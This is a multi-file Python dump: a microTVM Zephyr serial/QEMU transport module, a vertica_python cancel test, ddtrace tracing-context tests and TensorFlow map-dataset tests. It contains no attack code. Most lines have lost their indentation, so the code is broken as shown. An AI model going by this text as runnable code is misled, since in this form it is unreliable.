dt_inst = dtlib.DT(BUILD_DIR / "zephyr" / "zephyr.dts")
uart_baud = (
dt_inst.get_node("/chosen")
.props["zephyr,console"]
.to_path()
.props["current-speed"]
.to_num()
)
_LOG.debug("zephyr transport: found UART baudrate from devicetree: %d", uart_baud)
return uart_baud
@classmethod
def _find_nrf_serial_port(cls, options):
com_ports = subprocess.check_output(
["nrfjprog", "--com"] + _get_device_args(options), encoding="utf-8"
)
ports_by_vcom = {}
for line in com_ports.split("\n")[:-1]:
parts = line.split()
ports_by_vcom[parts[2]] = parts[1]
nrf_board = usb.core.find(idVendor=cls.NRF5340_VENDOR_ID)
        if nrf_board is None:
raise Exception("_find_nrf_serial_port: unable to find NRF5340DK")
if nrf_board.idProduct in cls.NRF5340_DK_BOARD_VCOM_BY_PRODUCT_ID:
vcom_port = cls.NRF5340_DK_BOARD_VCOM_BY_PRODUCT_ID[nrf_board.idProduct]
else:
raise Exception("_find_nrf_serial_port: unable to find known NRF5340DK product ID")
return ports_by_vcom[vcom_port]
@classmethod
def _find_openocd_serial_port(cls, options):
serial_number = options.get("openocd_serial")
return generic_find_serial_port(serial_number)
@classmethod
def _find_jlink_serial_port(cls, options):
return generic_find_serial_port()
@classmethod
def _find_serial_port(cls, options):
flash_runner = _get_flash_runner()
if flash_runner == "nrfjprog":
return cls._find_nrf_serial_port(options)
if flash_runner == "openocd":
return cls._find_openocd_serial_port(options)
if flash_runner == "jlink":
return cls._find_jlink_serial_port(options)
raise RuntimeError(f"Don't know how to deduce serial port for flash runner {flash_runner}")
def __init__(self, options):
self._options = options
self._port = None
def open(self):
port_path = self._find_serial_port(self._options)
self._port = serial.Serial(port_path, baudrate=self._lookup_baud_rate(self._options))
return server.TransportTimeouts(
session_start_retry_timeout_sec=2.0,
session_start_timeout_sec=5.0,
session_established_timeout_sec=5.0,
)
def close(self):
self._port.close()
self._port = None
def read(self, n, timeout_sec):
self._port.timeout = timeout_sec
to_return = self._port.read(n)
if not to_return:
raise server.IoTimeoutError()
return to_return
def write(self, data, timeout_sec):
self._port.write_timeout = timeout_sec
bytes_written = 0
while bytes_written < len(data):
n = self._port.write(data)
data = data[n:]
bytes_written += n
class ZephyrQemuMakeResult(enum.Enum):
QEMU_STARTED = "qemu_started"
MAKE_FAILED = "make_failed"
EOF = "eof"
class ZephyrQemuTransport:
"""The user-facing Zephyr QEMU transport class."""
def __init__(self, options):
self.options = options
self.proc = None
self.pipe_dir = None
self.read_fd = None
self.write_fd = None
        self._queue = queue.Queue()
        self.kwargs = {}  # extra Popen kwargs; open() adds an "env" entry when a gdbserver port is requested
def open(self):
self.pipe_dir = pathlib.Path(tempfile.mkdtemp())
self.pipe = self.pipe_dir / "fifo"
self.write_pipe = self.pipe_dir / "fifo.in"
self.read_pipe = self.pipe_dir / "fifo.out"
os.mkfifo(self.write_pipe)
os.mkfifo(self.read_pipe)
if "gdbserver_port" in self.options:
if "env" in self.kwargs:
self.kwargs["env"] = copy.copy(self.kwargs["env"])
else:
self.kwargs["env"] = os.environ.copy()
self.kwargs["env"]["TVM_QEMU_GDBSERVER_PORT"] = str(self.options["gdbserver_port"])
        self.proc = subprocess.Popen(
            ["make", "run", f"QEMU_PIPE={self.pipe}"],
            cwd=BUILD_DIR,
            stdout=subprocess.PIPE,
            **self.kwargs,  # forwards the env prepared above so TVM_QEMU_GDBSERVER_PORT reaches QEMU
        )
self._wait_for_qemu()
# NOTE: although each pipe is unidirectional, open both as RDWR to work around a select
# limitation on linux. Without this, non-blocking I/O can't use timeouts because named
        # FIFOs are always considered ready to read when no one has opened them for writing.
self.read_fd = os.open(self.read_pipe, os.O_RDWR | os.O_NONBLOCK)
self.write_fd = os.open(self.write_pipe, os.O_RDWR | os.O_NONBLOCK)
_set_nonblock(self.read_fd)
_set_nonblock(self.write_fd)
return server.TransportTimeouts(
session_start_retry_timeout_sec=2.0,
session_start_timeout_sec=10.0,
session_established_timeout_sec=10.0,
)
def close(self):
did_write = False
if self.write_fd is not None:
try:
server.write_with_timeout(
self.write_fd, b"\x01x", 1.0
) # Use a short timeout since we will kill the process
did_write = True
except server.IoTimeoutError:
pass
os.close(self.write_fd)
self.write_fd = None
if self.proc:
if not did_write:
self.proc.terminate()
try:
self.proc.wait(5.0)
except subprocess.TimeoutExpired:
self.proc.kill()
if self.read_fd:
os.close(self.read_fd)
self.read_fd = None
if self.pipe_dir is not None:
shutil.rmtree(self.pipe_dir)
self.pipe_dir = None
def read(self, n, timeout_sec):
return server.read_with_timeout(self.read_fd, n, timeout_sec)
def write(self, data, timeout_sec):
to_write = bytearray()
escape_pos = []
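        # 0x01 is QEMU's serial-mux escape byte (Ctrl-A); double any 0x01 in the payload so it
        # is forwarded literally instead of being interpreted (close() deliberately sends the
        # raw b"\x01x" sequence to ask QEMU to exit).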
for i, b in enumerate(data):
if b == 0x01:
to_write.append(b)
escape_pos.append(i)
to_write.append(b)
while to_write:
num_written = server.write_with_timeout(self.write_fd, to_write, timeout_sec)
to_write = to_write[num_written:]
def _qemu_check_stdout(self):
for line in self.proc.stdout:
line = str(line)
_LOG.info("%s", line)
if "[QEMU] CPU" in line:
self._queue.put(ZephyrQemuMakeResult.QEMU_STARTED)
else:
line = re.sub("[^a-zA-Z0-9 \n]", "", line)
pattern = r"recipe for target (\w*) failed"
if re.search(pattern, line, re.IGNORECASE):
self._queue.put(ZephyrQemuMakeResult.MAKE_FAILED)
self._queue.put(ZephyrQemuMakeResult.EOF)
def _wait_for_qemu(self):
threading.Thread(target=self._qemu_check_stdout, daemon=True).start()
while True:
try:
item = self._queue.get(timeout=120)
except Exception:
raise TimeoutError("QEMU setup timeout.")
if item == ZephyrQemuMakeResult.QEMU_STARTED:
break
if item in [ZephyrQemuMakeResult.MAKE_FAILED, ZephyrQemuMakeResult.EOF]:
raise RuntimeError("QEMU setup failed.")
raise ValueError(f"{item} not expected.")
if __name__ == "__main__":
server.main(Handler())
|
test_cancel.py
|
# Copyright (c) 2019-2020 Micro Focus or one of its affiliates.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from __future__ import print_function, division, absolute_import
from multiprocessing import Process
import pytest
import time
from .base import VerticaPythonIntegrationTestCase
from ... import errors
class CancelTestCase(VerticaPythonIntegrationTestCase):
def test_cursor_cancel(self):
        # Cursor.cancel() is no longer supported
with self._connect() as conn:
cursor = conn.cursor()
with self.assertRaises(errors.NotSupportedError):
cursor.cancel()
def test_connection_cancel_no_query(self):
with self._connect() as conn:
cur = conn.cursor()
# No query is being executed, cancel does nothing
conn.cancel()
@pytest.mark.timeout(30)
def test_connection_cancel_running_query(self):
def cancel_query(conn, delay=5):
time.sleep(delay)
conn.cancel()
with self._connect() as conn:
cur = conn.cursor()
p1 = Process(target=cancel_query, args=(conn,))
p1.start()
with self.assertRaises(errors.QueryCanceled):
long_running_query = ('select count(*) from '
'(select node_name from CONFIGURATION_PARAMETERS) as a cross join '
'(select node_name from CONFIGURATION_PARAMETERS) as b cross join '
'(select node_name from CONFIGURATION_PARAMETERS) as c')
cur.execute(long_running_query)
p1.join()
exec(CancelTestCase.createPrepStmtClass())
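# Illustrative sketch (not part of the original test module): the pattern exercised by
# test_connection_cancel_running_query above, outside the test harness -- cancel a long-running
# statement from a second process via Connection.cancel(). `conn_info` and `long_running_query`
# are placeholders you would supply yourself.
def _example_cancel_after_delay(conn, delay=5):
    time.sleep(delay)
    conn.cancel()
def _example_run_and_cancel(conn_info, long_running_query):
    import vertica_python
    with vertica_python.connect(**conn_info) as conn:
        cur = conn.cursor()
        canceller = Process(target=_example_cancel_after_delay, args=(conn,))
        canceller.start()
        try:
            cur.execute(long_running_query)
        except errors.QueryCanceled:
            pass  # the server aborted the statement as requested
        finally:
            canceller.join()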
|
test_context.py
|
import contextlib
import mock
import threading
from unittest import TestCase
from nose.tools import eq_, ok_
from tests.test_tracer import get_dummy_tracer
from ddtrace.span import Span
from ddtrace.context import Context, ThreadLocalContext
from ddtrace.ext.priority import USER_REJECT, AUTO_REJECT, AUTO_KEEP, USER_KEEP
class TestTracingContext(TestCase):
"""
Tests related to the ``Context`` class that hosts the trace for the
current execution flow.
"""
@contextlib.contextmanager
def override_partial_flush(self, ctx, enabled, min_spans):
original_enabled = ctx._partial_flush_enabled
original_min_spans = ctx._partial_flush_min_spans
ctx._partial_flush_enabled = enabled
ctx._partial_flush_min_spans = min_spans
try:
yield
finally:
ctx._partial_flush_enabled = original_enabled
ctx._partial_flush_min_spans = original_min_spans
def test_add_span(self):
# it should add multiple spans
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
eq_(1, len(ctx._trace))
eq_('fake_span', ctx._trace[0].name)
eq_(ctx, span.context)
def test_context_sampled(self):
# a context is sampled if the spans are sampled
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ok_(ctx._sampled is True)
ok_(ctx.sampling_priority is None)
def test_context_priority(self):
# a context is sampled if the spans are sampled
ctx = Context()
for priority in [USER_REJECT, AUTO_REJECT, AUTO_KEEP, USER_KEEP, None, 999]:
ctx.sampling_priority = priority
span = Span(tracer=None, name=('fake_span_%s' % repr(priority)))
ctx.add_span(span)
# It's "normal" to have sampled be true even when priority sampling is
            # set to 0 or -1. It would stay false even with priority set to 2.
# The only criteria to send (or not) the spans to the agent should be
# this "sampled" attribute, as it's tightly related to the trace weight.
ok_(ctx._sampled is True, 'priority has no impact on sampled status')
eq_(priority, ctx.sampling_priority)
def test_current_span(self):
# it should return the current active span
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
eq_(span, ctx.get_current_span())
def test_current_root_span_none(self):
# it should return none when there is no root span
ctx = Context()
eq_(None, ctx.get_current_root_span())
def test_current_root_span(self):
# it should return the current active root span
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
eq_(span, ctx.get_current_root_span())
def test_close_span(self):
# it should keep track of closed spans, moving
        # the current active span to its parent
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ctx.close_span(span)
eq_(1, ctx._finished_spans)
ok_(ctx.get_current_span() is None)
def test_get_trace(self):
# it should return the internal trace structure
# if the context is finished
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ctx.close_span(span)
trace, sampled = ctx.get()
eq_(1, len(trace))
eq_(span, trace[0])
ok_(sampled is True)
# the context should be empty
eq_(0, len(ctx._trace))
eq_(0, ctx._finished_spans)
ok_(ctx._current_span is None)
ok_(ctx._sampled is True)
def test_get_trace_empty(self):
# it should return None if the Context is not finished
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
trace, sampled = ctx.get()
ok_(trace is None)
ok_(sampled is None)
def test_partial_flush(self):
"""
When calling `Context.get`
When partial flushing is enabled
When we have just enough finished spans to flush
We return the finished spans
"""
tracer = get_dummy_tracer()
ctx = Context()
# Create a root span with 5 children, all of the children are finished, the root is not
root = Span(tracer=tracer, name='root')
ctx.add_span(root)
for i in range(5):
child = Span(tracer=tracer, name='child_{}'.format(i), trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
child._finished = True
ctx.add_span(child)
ctx.close_span(child)
with self.override_partial_flush(ctx, enabled=True, min_spans=5):
trace, sampled = ctx.get()
self.assertIsNotNone(trace)
self.assertIsNotNone(sampled)
self.assertEqual(len(trace), 5)
self.assertEqual(
set(['child_0', 'child_1', 'child_2', 'child_3', 'child_4']),
set([span.name for span in trace])
)
# Ensure we clear/reset internal stats as expected
self.assertEqual(ctx._finished_spans, 0)
self.assertEqual(ctx._trace, [root])
with self.override_partial_flush(ctx, enabled=True, min_spans=5):
trace, sampled = ctx.get()
self.assertIsNone(trace)
self.assertIsNone(sampled)
def test_partial_flush_too_many(self):
"""
When calling `Context.get`
When partial flushing is enabled
When we have more than the minimum number of spans needed to flush
We return the finished spans
"""
tracer = get_dummy_tracer()
ctx = Context()
# Create a root span with 5 children, all of the children are finished, the root is not
root = Span(tracer=tracer, name='root')
ctx.add_span(root)
for i in range(5):
child = Span(tracer=tracer, name='child_{}'.format(i), trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
child._finished = True
ctx.add_span(child)
ctx.close_span(child)
with self.override_partial_flush(ctx, enabled=True, min_spans=1):
trace, sampled = ctx.get()
self.assertIsNotNone(trace)
self.assertIsNotNone(sampled)
self.assertEqual(len(trace), 5)
self.assertEqual(
set(['child_0', 'child_1', 'child_2', 'child_3', 'child_4']),
set([span.name for span in trace])
)
# Ensure we clear/reset internal stats as expected
self.assertEqual(ctx._finished_spans, 0)
self.assertEqual(ctx._trace, [root])
with self.override_partial_flush(ctx, enabled=True, min_spans=5):
trace, sampled = ctx.get()
self.assertIsNone(trace)
self.assertIsNone(sampled)
def test_partial_flush_too_few(self):
"""
When calling `Context.get`
When partial flushing is enabled
When we do not have enough finished spans to flush
We return no spans
"""
tracer = get_dummy_tracer()
ctx = Context()
# Create a root span with 5 children, all of the children are finished, the root is not
root = Span(tracer=tracer, name='root')
ctx.add_span(root)
for i in range(5):
child = Span(tracer=tracer, name='child_{}'.format(i), trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
child._finished = True
ctx.add_span(child)
ctx.close_span(child)
# Test with having 1 too few spans for partial flush
with self.override_partial_flush(ctx, enabled=True, min_spans=6):
trace, sampled = ctx.get()
self.assertIsNone(trace)
self.assertIsNone(sampled)
self.assertEqual(len(ctx._trace), 6)
self.assertEqual(ctx._finished_spans, 5)
self.assertEqual(
set(['root', 'child_0', 'child_1', 'child_2', 'child_3', 'child_4']),
set([span.name for span in ctx._trace])
)
def test_partial_flush_remaining(self):
"""
When calling `Context.get`
When partial flushing is enabled
When we have some unfinished spans
We keep the unfinished spans around
"""
tracer = get_dummy_tracer()
ctx = Context()
        # Create a root span with 10 children; only the first 5 children get finished, the root does not
root = Span(tracer=tracer, name='root')
ctx.add_span(root)
for i in range(10):
child = Span(tracer=tracer, name='child_{}'.format(i), trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
ctx.add_span(child)
            # Close the first 5 only
if i < 5:
child._finished = True
ctx.close_span(child)
with self.override_partial_flush(ctx, enabled=True, min_spans=5):
trace, sampled = ctx.get()
# Assert partially flushed spans
            self.assertEqual(len(trace), 5)
self.assertIsNotNone(sampled)
self.assertEqual(
set(['child_0', 'child_1', 'child_2', 'child_3', 'child_4']),
set([span.name for span in trace])
)
# Assert remaining unclosed spans
self.assertEqual(len(ctx._trace), 6)
self.assertEqual(ctx._finished_spans, 0)
self.assertEqual(
set(['root', 'child_5', 'child_6', 'child_7', 'child_8', 'child_9']),
set([span.name for span in ctx._trace]),
)
def test_finished(self):
# a Context is finished if all spans inside are finished
ctx = Context()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
ctx.close_span(span)
ok_(ctx.is_finished())
def test_finished_empty(self):
# a Context is not finished if it's empty
ctx = Context()
ok_(ctx.is_finished() is False)
@mock.patch('logging.Logger.debug')
def test_log_unfinished_spans(self, log):
# when the root parent is finished, notify if there are spans still pending
tracer = get_dummy_tracer()
tracer.debug_logging = True
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name='root')
child_1 = Span(tracer=tracer, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child_2 = Span(tracer=tracer, name='child_2', trace_id=root.trace_id, parent_id=root.span_id)
child_1._parent = root
child_2._parent = root
ctx.add_span(root)
ctx.add_span(child_1)
ctx.add_span(child_2)
# close only the parent
root.finish()
ok_(ctx.is_finished() is False)
unfinished_spans_log = log.call_args_list[-3][0][2]
child_1_log = log.call_args_list[-2][0][1]
child_2_log = log.call_args_list[-1][0][1]
eq_(2, unfinished_spans_log)
ok_('name child_1' in child_1_log)
ok_('name child_2' in child_2_log)
ok_('duration 0.000000s' in child_1_log)
ok_('duration 0.000000s' in child_2_log)
@mock.patch('logging.Logger.debug')
def test_log_unfinished_spans_disabled(self, log):
# the trace finished status logging is disabled
tracer = get_dummy_tracer()
tracer.debug_logging = False
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name='root')
child_1 = Span(tracer=tracer, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child_2 = Span(tracer=tracer, name='child_2', trace_id=root.trace_id, parent_id=root.span_id)
child_1._parent = root
child_2._parent = root
ctx.add_span(root)
ctx.add_span(child_1)
ctx.add_span(child_2)
# close only the parent
root.finish()
ok_(ctx.is_finished() is False)
# the logger has never been invoked to print unfinished spans
for call, _ in log.call_args_list:
msg = call[0]
ok_('the trace has %d unfinished spans' not in msg)
@mock.patch('logging.Logger.debug')
def test_log_unfinished_spans_when_ok(self, log):
# if the unfinished spans logging is enabled but the trace is finished, don't log anything
tracer = get_dummy_tracer()
tracer.debug_logging = True
ctx = Context()
# manually create a root-child trace
root = Span(tracer=tracer, name='root')
child = Span(tracer=tracer, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
ctx.add_span(root)
ctx.add_span(child)
# close the trace
child.finish()
root.finish()
# the logger has never been invoked to print unfinished spans
for call, _ in log.call_args_list:
msg = call[0]
ok_('the trace has %d unfinished spans' not in msg)
def test_thread_safe(self):
# the Context must be thread-safe
ctx = Context()
def _fill_ctx():
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
threads = [threading.Thread(target=_fill_ctx) for _ in range(100)]
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
eq_(100, len(ctx._trace))
def test_clone(self):
ctx = Context()
ctx.sampling_priority = 2
# manually create a root-child trace
root = Span(tracer=None, name='root')
child = Span(tracer=None, name='child_1', trace_id=root.trace_id, parent_id=root.span_id)
child._parent = root
ctx.add_span(root)
ctx.add_span(child)
cloned_ctx = ctx.clone()
eq_(cloned_ctx._parent_trace_id, ctx._parent_trace_id)
eq_(cloned_ctx._parent_span_id, ctx._parent_span_id)
eq_(cloned_ctx._sampled, ctx._sampled)
eq_(cloned_ctx._sampling_priority, ctx._sampling_priority)
eq_(cloned_ctx._current_span, ctx._current_span)
eq_(cloned_ctx._trace, [])
eq_(cloned_ctx._finished_spans, 0)
class TestThreadContext(TestCase):
"""
Ensures that a ``ThreadLocalContext`` makes the Context
local to each thread.
"""
def test_get_or_create(self):
# asking the Context multiple times should return
# always the same instance
l_ctx = ThreadLocalContext()
eq_(l_ctx.get(), l_ctx.get())
def test_set_context(self):
# the Context can be set in the current Thread
ctx = Context()
local = ThreadLocalContext()
ok_(local.get() is not ctx)
local.set(ctx)
ok_(local.get() is ctx)
def test_multiple_threads_multiple_context(self):
        # each thread should have its own Context
l_ctx = ThreadLocalContext()
def _fill_ctx():
ctx = l_ctx.get()
span = Span(tracer=None, name='fake_span')
ctx.add_span(span)
eq_(1, len(ctx._trace))
threads = [threading.Thread(target=_fill_ctx) for _ in range(100)]
for t in threads:
t.daemon = True
t.start()
for t in threads:
t.join()
# the main instance should have an empty Context
# because it has not been used in this thread
ctx = l_ctx.get()
eq_(0, len(ctx._trace))
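# Illustrative sketch (not part of the original test module): the Context lifecycle the tests
# above exercise, condensed into one helper. A trace is only returned by get() once every span
# that was added to the Context has been closed.
def _example_context_lifecycle():
    ctx = Context()
    root = Span(tracer=None, name='root')
    child = Span(tracer=None, name='child', trace_id=root.trace_id, parent_id=root.span_id)
    child._parent = root
    ctx.add_span(root)
    ctx.add_span(child)
    ctx.close_span(child)
    assert ctx.get() == (None, None)  # one span is still open, so nothing is flushed yet
    ctx.close_span(root)
    trace, sampled = ctx.get()  # every span is closed, so the whole trace is returned
    assert set(span.name for span in trace) == {'root', 'child'}
    assert sampled is True
    return trace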
|
map_dataset_op_test.py
|
# Copyright 2017 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for the experimental input pipeline ops."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from collections import namedtuple
import threading
import time
import numpy as np
from tensorflow.python.client import session
from tensorflow.python.data.ops import dataset_ops
from tensorflow.python.framework import constant_op
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import errors
from tensorflow.python.framework import ops
from tensorflow.python.framework import sparse_tensor
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import data_flow_ops
from tensorflow.python.ops import functional_ops
from tensorflow.python.ops import lookup_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import script_ops
from tensorflow.python.ops import sparse_ops
from tensorflow.python.ops import string_ops
from tensorflow.python.ops import variable_scope
from tensorflow.python.platform import test
class MapDatasetTest(test.TestCase):
def _buildMapDataset(self, components, count):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components).map(_map_fn)
.repeat(count))
def testMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildMapDataset(components, count)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={count: 14})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={count: 18})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread) for _ in range(8)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
def _buildParallelMapDataset(self, components, count, num_parallel_calls,
output_buffer_size):
def _map_fn(x, y, z):
return math_ops.square(x), math_ops.square(y), math_ops.square(z)
return (dataset_ops.Dataset.from_tensor_slices(components)
.map(_map_fn, num_parallel_calls=num_parallel_calls)
.prefetch(output_buffer_size)
.repeat(count))
def testParallelMapDataset(self):
"""Test an dataset that maps a TF function across its input elements."""
# The pipeline is TensorSliceDataset -> ParallelMapDataset(square_3) ->
# RepeatDataset(count).
components = (np.arange(7),
np.array([[1, 2, 3]]) * np.arange(7)[:, np.newaxis],
np.array(37.0) * np.arange(7))
count = array_ops.placeholder(dtypes.int64, shape=[])
num_parallel_calls = array_ops.placeholder(dtypes.int32, shape=[])
output_buffer_size = array_ops.placeholder(dtypes.int64, shape=[])
dataset = self._buildParallelMapDataset(
components, count, num_parallel_calls, output_buffer_size)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
self.assertEqual([c.shape[1:] for c in components],
[t.shape for t in get_next])
with self.test_session() as sess:
def do_test(num_parallel_calls_val, output_buffer_size_val):
# Test single-threaded access to the iterator.
sess.run(init_op, feed_dict={
count: 14,
num_parallel_calls: num_parallel_calls_val,
output_buffer_size: output_buffer_size_val})
for _ in range(14):
for i in range(7):
result = sess.run(get_next)
for component, result_component in zip(components, result):
self.assertAllEqual(component[i]**2, result_component)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
# Test multi-threaded access to the same iterator.
sess.run(init_op, feed_dict={
count: 18,
num_parallel_calls: num_parallel_calls_val,
output_buffer_size: output_buffer_size_val})
results = []
def iterator_thread():
while True:
try:
results.append(sess.run(get_next))
except errors.OutOfRangeError:
return
threads = [self.checkedThread(target=iterator_thread)
for _ in range(64)]
for t in threads:
t.start()
for t in threads:
t.join()
# `results` will contain the same elements components**2
# repeated 18 times, but in a non-deterministic order. Sort the
# results, and assert that each element of components**2 is
# produced 18 times.
results.sort(key=lambda x: x[0])
for i in range(7):
for j in range(18):
for component, result_component in zip(components,
results[i * 18 + j]):
self.assertAllEqual(component[i]**2, result_component)
for num_parallel_calls_val, output_buffer_size_val in [
(1, 1), (1, 2), (2, 2), (2, 4), (8, 8), (8, 16)]:
do_test(num_parallel_calls_val, output_buffer_size_val)
def testImplicitDisposeParallelMapDataset(self):
# Tests whether a parallel map dataset will be cleaned up correctly when
# the pipeline does not run it until exhaustion.
# The pipeline is TensorSliceDataset -> MapDataset(square_3) ->
# RepeatDataset(1000).
components = (np.arange(1000),
np.array([[1, 2, 3]]) * np.arange(1000)[:, np.newaxis],
np.array(37.0) * np.arange(1000))
dataset = self._buildParallelMapDataset(components, 1000, 100, 100)
# NOTE(mrry): Also test that the prefetching thread is cancelled correctly.
dataset = dataset.prefetch(100)
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapUnspecifiedOutputSize(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
def testParallelMapError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"),
num_parallel_calls=2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testPrefetchError(self):
components = np.array([1., 2., 3., np.nan, 5.]).astype(np.float32)
dataset = (dataset_ops.Dataset.from_tensor_slices(components)
.map(lambda x: array_ops.check_numerics(x, "message"))
.prefetch(2))
iterator = dataset.make_initializable_iterator()
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(init_op)
for _ in range(3):
sess.run(get_next)
# The 4th element is NaN, so `array_ops.check_numerics()` should fail.
with self.assertRaises(errors.InvalidArgumentError):
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureHashTable(self):
# NOTE(mrry): We must use the V2 variants of `HashTable`
# etc. because these produce a `tf.resource`-typed output that is
# compatible with the in-graph function implementation.
default_val = -1
keys = constant_op.constant(["brain", "salad", "surgery"])
values = constant_op.constant([0, 1, 2], dtypes.int64)
table = lookup_ops.HashTable(
lookup_ops.KeyValueTensorInitializer(keys, values), default_val)
input_sentences = dataset_ops.Dataset.from_tensor_slices(
["brain brain tank salad surgery", "surgery brain"])
iterator = (input_sentences
.map(lambda x: string_ops.string_split([x]).values)
.map(table.lookup)
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(table.init)
sess.run(init_op)
sess.run(get_next)
sess.run(get_next)
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureQueue(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(200, dtypes.int64, shapes=[])
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: queue.dequeue()).make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for element in elements:
self.assertEqual(element, sess.run(get_next))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureSameResourceMultipleTimes(self):
elements = np.random.randint(100, size=[200])
queue = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
queue_2 = data_flow_ops.FIFOQueue(
200, dtypes.int64, shapes=[], shared_name="shared_queue")
enqueue_op = queue.enqueue_many(elements)
close_op = queue.close()
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(-1)
.map(lambda _: (queue.dequeue(), queue_2.dequeue()))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
with self.test_session() as sess:
sess.run(enqueue_op)
sess.run(close_op)
sess.run(init_op)
for i in range(100):
self.assertEqual(sorted([elements[i * 2], elements[i * 2 + 1]]),
sorted(sess.run(get_next)))
with self.assertRaises(errors.OutOfRangeError):
sess.run(get_next)
def testCaptureVariable(self):
counter_var = variable_scope.get_variable(
"counter", (), dtypes.int32, use_resource=True)
iterator = (dataset_ops.Dataset.from_tensors(0).repeat(10)
.map(lambda _: counter_var.assign_add(1))
.make_initializable_iterator())
init_op = iterator.initializer
get_next = iterator.get_next()
